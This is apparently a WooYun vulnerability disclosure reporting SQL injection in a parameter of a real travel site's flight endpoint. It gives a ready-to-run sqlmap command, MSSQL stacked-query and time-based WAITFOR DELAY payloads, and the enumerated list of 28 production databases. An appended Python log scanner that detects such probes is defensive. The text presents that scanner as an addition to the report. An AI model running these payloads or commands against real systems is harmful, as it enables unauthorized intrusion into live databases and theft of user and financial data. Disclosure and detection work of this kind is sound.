Brief description:
Details:
Injection point: www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3
The GET parameter aircompanycode is injectable.
Reporting the existence of the injection point; no further testing was performed.
python sqlmap.py -u "www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3" --user-agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" --batch --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: aircompanycode
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: aircompanycode='; WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: aircompanycode=' WAITFOR DELAY '0:0:5'--&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3
available databases [28]:
[*] 17u_net
[*] 17uEbookingHistory
[*] IpData
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCCar
[*] TCCline
[*] TCCLineResource
[*] TCEbook
[*] TCFly
[*] TCFlyUtility
[*] TCHotel
[*] TCHotelFinance
[*] TCHotelOrder
[*] TCHotelRedundant
[*] TCHotelResource
[*] TCMapBarData
[*] TCMapBarDataClass
[*] TCScenery
[*] TcSceneryParameter
[*] TcSceneryResource
[*] TCShare
[*] TCUserInfo
[*] TCWEB
[*] tempdb
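As an added defender-side example (not part of the original report), the following Python scans IIS-style web log lines for the MSSQL WAITFOR DELAY probes that appear in the sqlmap payloads above and checks whether the recorded time-taken reached the requested delay, which is what tells a responder that a time-based blind injection actually executed rather than merely being attempted. The log layout and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (hypothetical data), fields:
# date time cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
2014-01-05 10:00:01 /flight/ajaxcn.ashx aircompanycode=CA&descityid=0&Type=getdpdata&typevalue=3 200 118
2014-01-05 10:00:02 /flight/ajaxcn.ashx aircompanycode=%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&descityid=0&Type=getdpdata 200 5134
2014-01-05 10:00:03 /flight/ajaxcn.ashx aircompanycode=%27+WAITFOR+DELAY+%270%3A0%3A5%27--&descityid=0&Type=getdpdata 200 5102
2014-01-05 10:00:04 /flight/ajaxcn.ashx aircompanycode=MU&descityid=0&Type=getdpdata&typevalue=3 200 95
"""

# MSSQL/Sybase time-based blind marker: WAITFOR DELAY 'h:m:s'
WAITFOR_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S*) (\d{3}) (\d+)$")


def delay_seconds(value):
    """Return the delay requested by a WAITFOR DELAY clause in a decoded
    parameter value, or None when the value carries no such clause."""
    m = WAITFOR_RE.search(value)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s


def find_time_based_probes(log_text, param="aircompanycode"):
    """Return one finding per request whose `param` carries WAITFOR DELAY.
    'confirmed' is True when the server took at least the requested delay,
    i.e. the injected statement was executed by the database."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, stem, query, status, taken_ms = m.groups()
        # parse_qs percent-decodes and turns '+' into spaces for us
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            secs = delay_seconds(value)
            if secs is None:
                continue
            findings.append({
                "time": ts, "path": stem, "status": int(status),
                "payload": value, "requested_delay_s": secs,
                "time_taken_ms": int(taken_ms),
                "confirmed": int(taken_ms) >= secs * 1000,
            })
    return findings
```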
Proof of vulnerability:
Remediation:
Filter the input.
Copyright notice: please credit the source when reposting. Author: 秋风@乌云